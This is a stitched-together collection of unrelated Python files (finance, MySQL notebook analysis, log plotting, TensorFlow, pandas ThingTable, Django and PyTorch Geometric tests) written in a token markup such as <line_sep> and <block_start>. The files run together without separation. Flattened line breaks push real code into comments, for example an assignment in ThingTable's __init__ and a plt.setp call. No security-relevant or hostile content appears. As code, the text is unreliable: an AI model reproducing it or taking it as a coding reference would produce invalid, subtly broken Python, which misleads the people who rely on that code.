def test_capm_view():
    factors_view.capm_view(ticker="PM")
<import_from_future_stmt> print_function<line_sep># coding: utf-8 # In[1]: <import_from_stmt>builtins zip<line_sep>get_ipython().magic(u'matplotlib inline')<import_stmt>MySQLdb<import_stmt>pandas<as>pd<import_stmt>matplotlib<import_stmt>matplotlib.pyplot<as>plt<line_sep>plt.rcParams["figure.figsize"]=[20 12]<line_sep># In[2]: conn=MySQLdb.connect(host='localhost' user='root' passwd='<PASSWORD>' db='wikumnewdb')<line_sep>cursor=conn.cursor()<line_sep># In[3]: cursor.execute("select text, username, website_comment.created_at, url from website_opencomment INNER JOIN website_article on website_opencomment.article_id = website_article.id INNER JOIN website_commentauthor on website_opencomment.author_id = website_commentauthor.id INNER JOIN website_comment on website_opencomment.comment_id = website_comment.id")<line_sep>rows=cursor.fetchall()<line_sep># In[9]: # How many RfCs are opened per month? open_dates=[data[2]<for>data rows]<line_sep>df=pd.DataFrame(index=open_dates)<line_sep>df['count']=[1]<times>len(open_dates)<line_sep>resampled_df=df.resample('1M' label='right').sum()<line_sep># In[5]: fig,ax=plt.subplots()<line_sep>ax.plot(resampled_df.index resampled_df['count'])<line_sep>fig.suptitle('RfCs initiated' fontsize=20 fontweight='bold' y=0.05)<line_sep>years=plt.matplotlib.dates.YearLocator()<line_sep>months=plt.matplotlib.dates.MonthLocator(interval=3)<line_sep>yearsFmt=plt.matplotlib.dates.DateFormatter('%Y')<line_sep>monthsFmt=plt.matplotlib.dates.DateFormatter('%b')<line_sep>ax.xaxis.set_major_locator(years)<line_sep>ax.xaxis.set_major_formatter(yearsFmt)<line_sep>ax.xaxis.set_minor_locator(months)<line_sep>ax.xaxis.set_minor_formatter(monthsFmt)<line_sep>ax.set_xlabel("Date")<line_sep>ax.set_ylabel("Number of RfCs initiated")<line_sep>ax.xaxis.grid(<true>)<line_sep>ax.yaxis.grid(<true>)<line_sep>labels=ax.get_xticklabels()#"both" gives ugly formatting plt.setp(labels rotation=30 fontsize=15)<for_stmt>xy zip(resampled_df.index 
resampled_df['count'])<block_start>ax.annotate(xy[1] xy=xy textcoords='data')<block_end>plt.show()<line_sep># In[6]: # Maximum RfCs initiated in a month resampled_df.idxmax()<line_sep>resampled_df.max()<line_sep>print(int(resampled_df.max()))<line_sep># In[7]: # Top openers df=pd.DataFrame([[ij<for>ij i]<for>i rows])<line_sep>df.rename(columns={0:'text' 1:'user name' 2:'date' 3:'url'} inplace=<true>)<line_sep>opening_counts=pd.DataFrame(df.groupby('user name').size().rename('total openings'))<line_sep>opening_counts.sort_values(by='total openings' ascending=<false> inplace=<true>)<line_sep>opening_counts.iloc[0:30]<line_sep># In[ ]:
<import_stmt>re<import_stmt>matplotlib<import_stmt>matplotlib.cm<as>cm<import_stmt>matplotlib.patches<as>mpatches<import_stmt>matplotlib.pyplot<as>plt<import_stmt>numpy<as>np<line_sep># Regex used to match relevant loglines (in this case, a specific IP address) line_regex=re.compile(r".*$")<def_stmt>get_experiment_results log_file match_function<block_start>results=[]<with_stmt>open(log_file "r")<as>in_file<block_start><for_stmt>line in_file<block_start><if_stmt>(line_regex.search(line))<block_start>match=match_function(line)<if_stmt>match<is><not><none><block_start>results.append(match)<block_end><block_end><block_end><block_end><return>results<block_end><def_stmt>extract_from_worker s from_worker<block_start>pattern=re.compile(r"\[.*/0"+str(from_worker)+r"/.*\].*" re.VERBOSE)<line_sep>match=pattern.match(s)<if_stmt>match<is><none><block_start><return><none><block_end><return>s<block_end><def_stmt>print_none_match pattern l<block_start>print(pattern.pattern)<line_sep><raise>Exception(l)<block_end><def_stmt>get_loss s<block_start>pattern=re.compile(r".*\)\t(?P<loss>\d+\.\d+)\t.*" re.VERBOSE)<line_sep>match=pattern.match(s)<if_stmt>match<is><none><block_start><return><none><block_end><return>float(match.group("loss"))<block_end><def_stmt>get_noise s<block_start>pattern=re.compile(r".*iteration\[(?P<noise>[\-\+]?\d+\.\d+)\]\n" re.VERBOSE)<line_sep>match=pattern.match(s)<if_stmt>match<is><none><block_start><return><none><block_end><return>float(match.group("noise"))<block_end><def_stmt>plot lines<block_start>losses=[get_loss(l)<for>l lines]<line_sep>losses=filter(<none> losses)<line_sep>noises=[get_noise(l)<for>l lines]<line_sep>noises=filter(<none> noises)<line_sep>pairs=zip(losses noises)<line_sep>pairs.sort(key=<lambda>x:x[0])<line_sep>print(pairs)<line_sep>losses,noises=zip(*pairs)<line_sep>plt.ylim([-200000 200000])<line_sep>plt.title('ResNet-32 gradient noise scale')<line_sep>plt.ylabel('Gradient Noise')<line_sep>plt.xlabel('Training 
Loss')<line_sep>plt.plot(losses noises)<line_sep>plt.show()<block_end><def_stmt>main <block_start>num_workers=1<line_sep>workers=[]<for_stmt>worker range(num_workers)<block_start>worker=get_experiment_results('./correctnoise-tensorboard.log' <lambda>x:extract_from_worker(x worker))<line_sep>workers.append(worker)<block_end><for_stmt>worker_logs workers<block_start>plot(worker_logs)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end>
# Assign functions to a variable <def_stmt>add a b<block_start><return>a+b<block_end>plus=add<line_sep>value=plus(1 2)<line_sep>print(value)# 3 # Lambda value=(<lambda>a b:a+b)(1 2)<line_sep>print(value)# 3 addition=<lambda>a b:a+b<line_sep>value=addition(1 2)<line_sep>print(value)# 3 authors=['<NAME>' '<NAME>' '<NAME>' '<NAME>' '<NAME>' '<NAME>']<line_sep>sorted_authors_by_name_length=sorted(authors key=len)<line_sep>print(sorted_authors_by_name_length)<line_sep>sorted_authors_by_last_name=sorted(authors key=<lambda>name:name.split()[-1])<line_sep>print(sorted_authors_by_last_name)<line_sep>
<import_stmt>tensorflow<as>tf<import_from_stmt>dltk.core.activations leaky_relu<import_stmt>numpy<as>np<def_stmt>test_leaky_relu <block_start>test_alpha=tf.constant(0.1)<line_sep>test_inp_1=tf.constant(1.)<line_sep>test_inp_2=tf.constant(-1.)<line_sep>test_relu_1=leaky_relu(test_inp_1 test_alpha)<line_sep>test_relu_2=leaky_relu(test_inp_2 test_alpha)<with_stmt>tf.Session()<as>s<block_start>out_1=s.run(test_relu_1)<assert_stmt>np.isclose(out_1 1.) 'Got {} but expected {}'.format(out_1 1.)<line_sep>out_2=s.run(test_relu_2)<assert_stmt>np.isclose(out_2 -0.1) 'Got {} but expected {}'.format(out_2 -0.1)<block_end><block_end>
# # Copyright (c) 2021 IBM Corp. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # <import_stmt>textwrap<line_sep># # thing_table.py # # Part of text_extensions_for_pandas # # Data structure for managing collections of immutable items that implement # __hash__ and __eq__. Serves as a base class for StringTable # <import_from_stmt>abc ABC abstractmethod<import_from_stmt>typing *<import_stmt>numpy<as>np<class_stmt>ThingTable(ABC)<block_start>""" A set of immutable things, plus integer IDs for said things. Also implicitly maps `None` to ID -1. Serves as a base class for collections of specific things like strings and tokenizations. """<line_sep># Special integer ID for None as a thing. 
NONE_ID=-1<line_sep># Special integer ID for "not an id" NOT_AN_ID=-2<def_stmt>__init__ self# Bidirectional map from unique thing (possibly boxed for dictionary # compatibility) to integer ID and back <block_start>self._boxed_thing_to_id={}# type: Dict[Any, int] self._id_to_boxed_thing=[]# type: List[Any] self._total_bytes=0<block_end># type: int @abstractmethod<def_stmt>size_of_thing self thing:Any<arrow>int<block_start>""" :param thing: Thing to be insterted in this table :return: The number of bytes that the thing occupies in memory """<line_sep><pass><block_end>@abstractmethod<def_stmt>type_of_thing self<arrow>Type<block_start>""" :return: Expected type of things that this table will manage """<line_sep><pass><block_end><def_stmt>box self thing:Any<arrow>Any<block_start>""" Subclasses should override this method if they manage items that aren't compatible with Python dictionaries. :param thing: Thing to insert into the table :return: a dictionary-compatible boxed version of `thing`, if such boxing is needed to make `thing` dictionary-compatible. """<line_sep># Default implementation is a no-op <return>thing<block_end><def_stmt>unbox self boxed_thing:Any<arrow>Any<block_start>""" Subclasses should override this method if they manage items that aren't compatible with Python dictionaries. :param boxed_thing: Thing that was boxed by this class's `box` method. :return: Original thing that was passed to `box` """<line_sep># Default implementation is a no-op <return>boxed_thing<block_end>@classmethod<def_stmt>create_single cls thing:Any<block_start>""" Factory method for building a table containing a single value at ID 0. Users of this class are encouraged to use this method when possible, so that performance tuning can be localized to this method. """<line_sep># For now we return a fresh table each time. 
ret=cls()<line_sep>ret.maybe_add_thing(thing)<line_sep><return>ret<block_end>@classmethod<def_stmt>merge_tables_and_ids cls tables:Sequence["ThingTable"] int_ids:Sequence[np.ndarray]<arrow>Tuple["ThingTable" np.ndarray]<block_start>""" Factory method for combining together multiple references to different ThingTables into references to a new, combined ThingTable of the same type. Users of this class are encouraged to use this method when possible, so that performance tuning can be localized to this method. :param tables: A list of (possibly) different mappings from int to string :param int_ids: List of lists of integer IDs that decode to strings via the corresponding elements of `tables`. :returns: A tuple containing: * A new, merged table containing all the unique things under `tables` that are referenced in `int_ids` (and possibly additional things that aren't referenced) * Numpy arrays of integer offsets into the new table, corresponding to the elements of `int_ids` """<if_stmt>len(tables)<ne>len(int_ids)<block_start><raise>ValueError(f"Got {len(tables)} {cls}s "<concat>f"and {len(int_ids)} lists of IDs.")<block_end># TODO: Add fast-path code here to pass through the first table if # both input tables are identical. 
new_table=cls()<line_sep>new_ids_list=[]<for_stmt>i range(len(tables))<block_start>old_table=tables[i]<if_stmt><not>isinstance(old_table cls)<block_start><raise>TypeError(f"Expected table of type {cls}, but got "<concat>f"{type(old_table)}")<block_end>old_ids=int_ids[i]<if_stmt>len(old_ids.shape)<ne>1<block_start><raise>ValueError(f"Invalid shape for IDs {old_ids}")<block_end>new_ids=np.empty_like(old_ids dtype=int)<line_sep>old_id_to_new_id=[new_table.maybe_add_thing(old_table.id_to_thing(j))<for>j range(old_table.num_things)]<for_stmt>j range(len(old_ids))<block_start>new_ids[j]=old_id_to_new_id[old_ids[j]]<block_end>new_ids_list.append(new_ids)<block_end><return>new_table new_ids_list<block_end>@classmethod<def_stmt>merge_things cls things:Union[Sequence[Any] np.ndarray]<block_start>f""" Factory method for bulk-adding multiple things to create a single ThingTable and a list of integer IDs against that ThingTable. Users of this class are encouraged to use this method when possible, so that performance tuning can be localized to this method. :param things: things to be de-duplicated and converted to a ThingTable. :returns: Two values: * A ThingTable containing (at least) all the unique strings in `strings` * A Numppy array of integer string IDs against the returned ThingTable, where each ID maps to the corresponding element of `strings` """<line_sep>new_table=cls()<line_sep>str_ids=np.empty(len(things) dtype=int)<for_stmt>i range(len(things))<block_start>str_ids[i]=new_table.maybe_add_thing(things[i])<block_end><return>new_table str_ids<block_end>@classmethod<def_stmt>from_things cls things:Union[Sequence[Any] np.ndarray]<block_start>""" Factory method for creating a ThingTable from a sequence of unique things. :param things: sequence of unique things to be added to the ThingTable. :return: A ThingTable containing the elements of `things`. 
"""<line_sep>new_table=cls()<for_stmt>thing things<block_start>new_table.add_thing(thing)<block_end><return>new_table<block_end><def_stmt>thing_to_id self thing:Any<arrow>int<block_start>""" :param thing: A thing to look up in this table :returns: One of: * The integer ID of the indicated thing, if present. * `ThingTable.NONE_ID` if thing is None * `ThingTable.NOT_AN_ID` if thing is not present in the table """<if_stmt>thing<is><none># By convention, None maps to -1 <block_start><return>ThingTable.NONE_ID<block_end><elif_stmt><not>isinstance(thing self.type_of_thing())<block_start><raise>TypeError(f"Expected an object of type {self.type_of_thing()}, "<concat>f"but received an object of type {type(thing)}")<block_end><else_stmt># Remaining branches require boxing for dictionary lookup <block_start>boxed_thing=self.box(thing)<if_stmt>boxed_thing<not><in>self._boxed_thing_to_id<block_start><return>ThingTable.NOT_AN_ID<block_end><else_stmt><block_start><return>self._boxed_thing_to_id[boxed_thing]<block_end><block_end><block_end><def_stmt>id_to_thing self int_id:Union[int np.int64 np.int32]<arrow>Any<block_start>""" :param int_id: Integer ID that is potentially associated with a thing in the table :return: The associated thing, if present, or `None` if no thing is associated with the indicated ID. """<if_stmt><not>isinstance(int_id (int np.int64 np.int32))<block_start><raise>TypeError(f"Expected integer, but received {int_id} "<concat>f"of type {type(int_id)}")<block_end><elif_stmt>int_id<le>ThingTable.NOT_AN_ID<block_start><raise>ValueError(f"Invalid ID {int_id}")<block_end><elif_stmt>ThingTable.NONE_ID<eq>int_id<block_start><return><none><block_end><else_stmt><block_start>boxed_thing=self._id_to_boxed_thing[int_id]<line_sep><return>self.unbox(boxed_thing)<block_end><block_end><def_stmt>ids_to_things self int_ids:Union[Sequence[int] np.ndarray]<arrow>np.ndarray<block_start>""" Vectorized version of :func:`id_to_string` for translating multiple IDs at once. 
:param int_ids: Multiple integer IDs to be translated to strings :returns: A numpy array of string objects. """<if_stmt><not>isinstance(int_ids np.ndarray)<block_start>int_ids=np.array(int_ids dtype=int)<block_end><if_stmt>len(int_ids.shape)<ne>1<block_start><raise>TypeError(f"Invalid shape {int_ids.shape} for array of integer IDs.")<block_end>ret=np.empty(len(int_ids) dtype=object)<for_stmt>i range(len(int_ids))<block_start>ret[i]=self.id_to_thing(int_ids[i].item())<block_end><return>ret<block_end><def_stmt>add_thing self thing:Any<arrow>int<block_start>""" Adds a thing to the table. Raises a ValueError if the thing is already present. :param thing: Thing to add :return: unique ID for this thing """<if_stmt><not>isinstance(thing self.type_of_thing())<block_start><raise>TypeError(f"Expected an object of type {self.type_of_thing()}, "<concat>f"but received an object of type {type(thing)}")<block_end># Box for dictionary compatibility boxed_thing=self.box(thing)<if_stmt>boxed_thing<in>self._boxed_thing_to_id<block_start><raise>ValueError(f"'{textwrap.shorten(str(thing) 40)}' already in table")<block_end>new_id=len(self._id_to_boxed_thing)<line_sep>self._id_to_boxed_thing.append(boxed_thing)<line_sep>self._boxed_thing_to_id[boxed_thing]=new_id<line_sep>self._total_bytes<augadd>self.size_of_thing(thing)<line_sep><return>new_id<block_end><def_stmt>maybe_add_thing self thing:Any<arrow>int<block_start>""" Adds a thing to the table if it is not already present. 
:param thing: Thing to add :return: unique ID for this thing """<if_stmt><not>isinstance(thing self.type_of_thing())<block_start><raise>TypeError(f"Expected an object of type {self.type_of_thing()}, "<concat>f"but received an object of type {type(thing)}")<block_end>current_id=self.thing_to_id(thing)<if_stmt>current_id<ne>ThingTable.NOT_AN_ID<block_start><return>current_id<block_end><else_stmt><block_start><return>self.add_thing(thing)<block_end><block_end><def_stmt>maybe_add_things self s:Sequence[Any]<arrow>np.ndarray<block_start>""" Vectorized version of :func:`maybe_add_thing` for translating, and potentially adding multiple things at once. :param s: Multiple things to be translated and potentially added :returns: A numpy array of the corresponding integer IDs for the things. Adds each things to the table if it is not already present. """<line_sep>result=np.empty(len(s) dtype=np.int32)<for_stmt>i range(len(result))<block_start>result[i]=self.maybe_add_thing(s[i])<block_end><return>result<block_end><def_stmt>nbytes self<block_start>""" Number of bytes in a (currently hypothetical) serialized version of this table. """<line_sep><return>self._total_bytes<block_end>@property<def_stmt>num_things self<arrow>int<block_start>""" :return: Number of distinct things in the table """<line_sep><return>len(self._id_to_boxed_thing)<block_end>@property<def_stmt>things self<arrow>Iterator[Any]<block_start>""" :return: Iterator over the unique things stored in this table. 
"""<line_sep><return>(self.unbox(thing)<for>thing self._id_to_boxed_thing)<block_end>@property<def_stmt>ids self<arrow>Iterator[int]<block_start>""" :return: Iterator over the IDs of things stored in this table, including the implicit ID ThingTable.NONE_ID """<if_stmt>ThingTable.NONE_ID<ne>-1<block_start><raise>ValueError("Someone has changed the value of NONE_ID; need to rewrite "<concat>"this function.")<block_end><return>range(-1 len(self._id_to_boxed_thing))<block_end><def_stmt>things_to_ids self things:Sequence[Any]<arrow>np.ndarray<block_start>""" Vectorized version of :func:`thing_to_id` for translating multiple things at once. :param things: Multiple things to be translated to IDs. Must be already in the table's set of things. :returns: A numpy array of the same integers that :func:`thing_to_id` would return. """<line_sep>ret=np.empty(len(things) dtype=np.int32)<for_stmt>i range(len(things))<block_start>ret[i]=self.thing_to_id(things[i])<block_end><return>ret<block_end><block_end>
<import_from_stmt>rest_framework serializers<import_from_stmt>openbook_categories.models Category<class_stmt>GetCategoriesCategorySerializer(serializers.ModelSerializer)<block_start><class_stmt>Meta<block_start>model=Category<line_sep>fields=('id' 'name' 'title' 'description' 'avatar' 'color')<block_end><block_end>
<def_stmt>iob_ranges words tags<block_start>""" IOB -> Ranges """<assert_stmt>len(words)<eq>len(tags)<line_sep>ranges=[]<def_stmt>check_if_closing_range <block_start><if_stmt>i<eq>len(tags)-1<or>tags[i+1].split('_')[0]<eq>'O'<block_start>ranges.append({'entity':''.join(words[begin:i+1]) 'type':temp_type 'start':begin 'end':i})<block_end><block_end><for_stmt>i,tag enumerate(tags)<block_start><if_stmt>tag.split('_')[0]<eq>'O'<block_start><pass><block_end><elif_stmt>tag.split('_')[0]<eq>'B'<block_start>begin=i<line_sep>temp_type=tag.split('_')[1]<line_sep>check_if_closing_range()<block_end><elif_stmt>tag.split('_')[0]<eq>'I'<block_start>check_if_closing_range()<block_end><block_end><return>ranges<block_end>
<import_from_stmt>unittest.mock patch<import_from_stmt>django.test TestCase<import_stmt>vcr<import_from_stmt>data_refinery_common.models Contribution Experiment ExperimentSampleAssociation OntologyTerm Sample SampleAttribute <import_from_stmt>data_refinery_foreman.foreman.management.commands.import_external_sample_attributes Command import_metadata import_sample_attributes <line_sep>TEST_METADATA="/home/user/data_store/externally_supplied_metadata/test_data/metadata.json"<class_stmt>ImportExternalSampleAttributesTestCase(TestCase)<block_start><def_stmt>setUp self<block_start>experiment=Experiment()<line_sep>experiment.accession_code="GSE000"<line_sep>experiment.alternate_accession_code="E-GEOD-000"<line_sep>experiment.title="NONONONO"<line_sep>experiment.description="Boooooourns. Wasabi."<line_sep>experiment.technology="RNA-SEQ"<line_sep>experiment.save()<line_sep>self.experiment=experiment<line_sep># Create some samples to attach metadata to sample=Sample()<line_sep>sample.accession_code="SRR123"<line_sep>sample.technology="RNA-SEQ"<line_sep>sample.source_database="SRA"<line_sep>sample.title="Not important"<line_sep>sample.save()<line_sep>experiment_sample_association=ExperimentSampleAssociation()<line_sep>experiment_sample_association.sample=sample<line_sep>experiment_sample_association.experiment=experiment<line_sep>experiment_sample_association.save()<line_sep>sample2=Sample()<line_sep>sample2.accession_code="SRR456"<line_sep>sample2.technology="RNA-SEQ"<line_sep>sample2.source_database="SRA"<line_sep>sample2.title="Not important"<line_sep>sample2.save()<line_sep>experiment_sample_association=ExperimentSampleAssociation()<line_sep>experiment_sample_association.sample=sample2<line_sep>experiment_sample_association.experiment=experiment<line_sep>experiment_sample_association.save()<line_sep># Create the ontology terms I'm using in the tests 
name=OntologyTerm()<line_sep>name.ontology_term="PATO:0000122"<line_sep>name.human_readable_name="length"<line_sep>name.save()<line_sep>unit=OntologyTerm()<line_sep>unit.ontology_term="UO:0010012"<line_sep>unit.human_readable_name="thou"<line_sep>unit.save()<line_sep>contribution=Contribution()<line_sep>contribution.source_name="refinebio_tests"<line_sep>contribution.methods_url="ccdatalab.org"<line_sep>contribution.save()<line_sep>self.contribution=contribution<block_end># # Test import_sample_attributes() # <def_stmt>test_skip_unknown_sample self<block_start>"""Make sure that if someone has metadata for a sample that we haven't surveyed then we just do nothing"""<line_sep>METADATA=[{"PATO:0000122":{"value":25 "unit":"UO:0010012"}}]<line_sep>import_sample_attributes("SRR789" METADATA self.contribution)<line_sep>self.assertEqual(SampleAttribute.objects.all().count() 0)<block_end><def_stmt>test_import_invalid_ontology_term self<block_start>METADATA=[{"PATO:0000122":{"value":25 "unit":"thou"}}]<line_sep>self.assertRaises(ValueError import_sample_attributes "SRR123" METADATA self.contribution)<line_sep>METADATA=[{"length":{"value":25 "unit":"UO:0010012"}}]<line_sep>self.assertRaises(ValueError import_sample_attributes "SRR123" METADATA self.contribution)<block_end><def_stmt>test_import_valid_sample_attributes self<block_start>METADATA=[{"PATO:0000122":{"value":25 "unit":"UO:0010012"}}]<line_sep>import_sample_attributes("SRR123" METADATA self.contribution)<line_sep>self.assertEqual(SampleAttribute.objects.all().count() 1)<line_sep>contributed_metadata=Sample.objects.get(accession_code="SRR123").contributed_metadata<line_sep>self.assertEqual(contributed_metadata[self.contribution.source_name]["length"] {"unit":"thou" "value":25} )<block_end># # Test import_metadata() # <def_stmt>test_import_valid_metadata self<block_start>METADATA=[{"sample_accession":"SRR123" "attributes":[{"PATO:0000122":{"value":25 "unit":"UO:0010012"}}] }]<line_sep>import_metadata(METADATA 
self.contribution)<line_sep>self.assertEqual(SampleAttribute.objects.all().count() 1)<line_sep>contributed_metadata=Sample.objects.get(accession_code="SRR123").contributed_metadata<line_sep>self.assertEqual(contributed_metadata[self.contribution.source_name]["length"] {"unit":"thou" "value":25} )<block_end># # End-to-end test # @vcr.use_cassette("/home/user/data_store/cassettes/foreman.sample_attributes.end-to-end.yaml")<def_stmt>test_management_command self<block_start>sample=Sample()<line_sep>sample.accession_code="DRR001173"<line_sep>sample.technology="RNA-SEQ"<line_sep>sample.source_database="SRA"<line_sep>sample.title="Not important"<line_sep>sample.save()<line_sep>command=Command()<line_sep>SOURCE_NAME="refinebio_tests"<line_sep>command.handle(file=TEST_METADATA source_name=SOURCE_NAME methods_url="ccdatalab.org")<line_sep>self.assertEqual(SampleAttribute.objects.all().count() 1)<line_sep>contributed_metadata=sample.contributed_metadata<line_sep>self.assertEqual(set(contributed_metadata[SOURCE_NAME]["biological sex"].keys()) {"value" "confidence"} )<line_sep>self.assertEqual(contributed_metadata[SOURCE_NAME]["biological sex"]["value"].human_readable_name "female" )<line_sep>self.assertAlmostEqual(contributed_metadata[SOURCE_NAME]["biological sex"]["confidence"] 0.7856624891880539)<block_end><block_end>
<import_from_stmt>io StringIO<import_from_stmt>django.core.management call_command<import_from_stmt>django.core.management.base CommandError<import_from_stmt>django.test TestCase<import_from_stmt>flags.state flag_enabled<class_stmt>EnableFlagTestCase(TestCase)<block_start><def_stmt>test_enable_flag self<block_start>out=StringIO()<line_sep>self.assertFalse(flag_enabled("DB_FLAG"))<line_sep>call_command("enable_flag" "DB_FLAG" stdout=out)<line_sep>self.assertTrue(flag_enabled("DB_FLAG"))<line_sep>self.assertIn("Successfully enabled" out.getvalue())<block_end><def_stmt>test_enable_flag_non_existent_flag self<block_start><with_stmt>self.assertRaises(CommandError)<block_start>call_command("enable_flag" "FLAG_DOES_NOT_EXIST")<block_end><block_end><block_end>
<import_stmt>pytest<import_stmt>torch<import_from_stmt>torch_geometric.data Data HeteroData<import_from_stmt>torch_geometric.loader LinkNeighborLoader<def_stmt>get_edge_index num_src_nodes num_dst_nodes num_edges<block_start>row=torch.randint(num_src_nodes (num_edges ) dtype=torch.long)<line_sep>col=torch.randint(num_dst_nodes (num_edges ) dtype=torch.long)<line_sep><return>torch.stack([row col] dim=0)<block_end><def_stmt>unique_edge_pairs edge_index<block_start><return>set(map(tuple edge_index.t().tolist()))<block_end>@pytest.mark.parametrize('directed' [<true> <false>])@pytest.mark.parametrize('neg_sampling_ratio' [0.0 1.0])<def_stmt>test_homogeneous_link_neighbor_loader directed neg_sampling_ratio<block_start>torch.manual_seed(12345)<line_sep>pos_edge_index=get_edge_index(100 50 500)<line_sep>neg_edge_index=get_edge_index(100 50 500)<line_sep>neg_edge_index[1 :]<augadd>50<line_sep>edge_label_index=torch.cat([pos_edge_index neg_edge_index] dim=-1)<line_sep>edge_label=torch.cat([torch.ones(500) torch.zeros(500)] dim=0)<line_sep>data=Data()<line_sep>data.edge_index=pos_edge_index<line_sep>data.x=torch.arange(100)<line_sep>data.edge_attr=torch.arange(500)<line_sep>loader=LinkNeighborLoader(data num_neighbors=[-1]<times>2 batch_size=20 edge_label_index=edge_label_index edge_label=edge_label<if>neg_sampling_ratio<eq>0.0<else><none> directed=directed neg_sampling_ratio=neg_sampling_ratio shuffle=<true> )<assert_stmt>str(loader)<eq>'LinkNeighborLoader()'<assert_stmt>len(loader)<eq>1000/20<for_stmt>batch loader<block_start><assert_stmt>isinstance(batch Data)<assert_stmt>len(batch)<eq>5<assert_stmt>batch.x.size(0)<le>100<assert_stmt>batch.x.min()<ge>0<and>batch.x.max()<l>100<assert_stmt>batch.edge_index.min()<ge>0<assert_stmt>batch.edge_index.max()<l>batch.num_nodes<assert_stmt>batch.edge_attr.min()<ge>0<assert_stmt>batch.edge_attr.max()<l>500<if_stmt>neg_sampling_ratio<eq>0.0<block_start><assert_stmt>batch.edge_label_index.size(1)<eq>20<line_sep># Assert positive samples 
are present in the original graph: edge_index=unique_edge_pairs(batch.edge_index)<line_sep>edge_label_index=batch.edge_label_index[: batch.edge_label<eq>1]<line_sep>edge_label_index=unique_edge_pairs(edge_label_index)<assert_stmt>len(edge_index|edge_label_index)<eq>len(edge_index)<line_sep># Assert negative samples are not present in the original graph: edge_index=unique_edge_pairs(batch.edge_index)<line_sep>edge_label_index=batch.edge_label_index[: batch.edge_label<eq>0]<line_sep>edge_label_index=unique_edge_pairs(edge_label_index)<assert_stmt>len(edge_index&edge_label_index)<eq>0<block_end><else_stmt><block_start><assert_stmt>batch.edge_label_index.size(1)<eq>40<assert_stmt>torch.all(batch.edge_label[:20]<eq>1)<assert_stmt>torch.all(batch.edge_label[20:]<eq>0)<block_end><block_end><block_end>@pytest.mark.parametrize('directed' [<true> <false>])@pytest.mark.parametrize('neg_sampling_ratio' [0.0 1.0])<def_stmt>test_heterogeneous_link_neighbor_loader directed neg_sampling_ratio<block_start>torch.manual_seed(12345)<line_sep>data=HeteroData()<line_sep>data['paper'].x=torch.arange(100)<line_sep>data['author'].x=torch.arange(100 300)<line_sep>data['paper' 'paper'].edge_index=get_edge_index(100 100 500)<line_sep>data['paper' 'paper'].edge_attr=torch.arange(500)<line_sep>data['paper' 'author'].edge_index=get_edge_index(100 200 1000)<line_sep>data['paper' 'author'].edge_attr=torch.arange(500 1500)<line_sep>data['author' 'paper'].edge_index=get_edge_index(200 100 1000)<line_sep>data['author' 'paper'].edge_attr=torch.arange(1500 2500)<line_sep>loader=LinkNeighborLoader(data num_neighbors=[-1]<times>2 edge_label_index=('paper' 'author') batch_size=20 directed=directed neg_sampling_ratio=neg_sampling_ratio shuffle=<true> )<assert_stmt>str(loader)<eq>'LinkNeighborLoader()'<assert_stmt>len(loader)<eq>1000/20<for_stmt>batch loader<block_start><assert_stmt>isinstance(batch HeteroData)<if_stmt>neg_sampling_ratio<eq>0.0<block_start><assert_stmt>len(batch)<eq>4<line_sep># Assert 
positive samples are present in the original graph: edge_index=unique_edge_pairs(batch['paper' 'author'].edge_index)<line_sep>edge_label_index=batch['paper' 'author'].edge_label_index<line_sep>edge_label_index=unique_edge_pairs(edge_label_index)<assert_stmt>len(edge_index|edge_label_index)<eq>len(edge_index)<block_end><else_stmt><block_start><assert_stmt>len(batch)<eq>5<assert_stmt>batch['paper' 'author'].edge_label_index.size(1)<eq>40<assert_stmt>torch.all(batch['paper' 'author'].edge_label[:20]<eq>1)<assert_stmt>torch.all(batch['paper' 'author'].edge_label[20:]<eq>0)<block_end><block_end><block_end>@pytest.mark.parametrize('directed' [<true> <false>])<def_stmt>test_heterogeneous_link_neighbor_loader_loop directed<block_start>torch.manual_seed(12345)<line_sep>data=HeteroData()<line_sep>data['paper'].x=torch.arange(100)<line_sep>data['author'].x=torch.arange(100 300)<line_sep>data['paper' 'paper'].edge_index=get_edge_index(100 100 500)<line_sep>data['paper' 'author'].edge_index=get_edge_index(100 200 1000)<line_sep>data['author' 'paper'].edge_index=get_edge_index(200 100 1000)<line_sep>loader=LinkNeighborLoader(data num_neighbors=[-1]<times>2 edge_label_index=('paper' 'paper') batch_size=20 directed=directed)<for_stmt>batch loader<block_start><assert_stmt>batch['paper'].x.size(0)<le>100<assert_stmt>batch['paper'].x.min()<ge>0<and>batch['paper'].x.max()<l>100<line_sep># Assert positive samples are present in the original graph: edge_index=unique_edge_pairs(batch['paper' 'paper'].edge_index)<line_sep>edge_label_index=batch['paper' 'paper'].edge_label_index<line_sep>edge_label_index=unique_edge_pairs(edge_label_index)<assert_stmt>len(edge_index|edge_label_index)<eq>len(edge_index)<block_end><block_end><def_stmt>test_link_neighbor_loader_edge_label <block_start>torch.manual_seed(12345)<line_sep>edge_index=get_edge_index(100 100 500)<line_sep>data=Data(edge_index=edge_index x=torch.arange(100))<line_sep>loader=LinkNeighborLoader(data num_neighbors=[-1]<times>2 
batch_size=10 neg_sampling_ratio=1.0 )<for_stmt>batch loader<block_start><assert_stmt>batch.edge_label.dtype<eq>torch.float<assert_stmt>torch.all(batch.edge_label[:10]<eq>1.0)<assert_stmt>torch.all(batch.edge_label[10:]<eq>0.0)<block_end>loader=LinkNeighborLoader(data num_neighbors=[-1]<times>2 batch_size=10 edge_label=torch.ones(500 dtype=torch.long) neg_sampling_ratio=1.0 )<for_stmt>batch loader<block_start><assert_stmt>batch.edge_label.dtype<eq>torch.long<assert_stmt>torch.all(batch.edge_label[:10]<eq>2)<assert_stmt>torch.all(batch.edge_label[10:]<eq>0)<block_end><block_end>
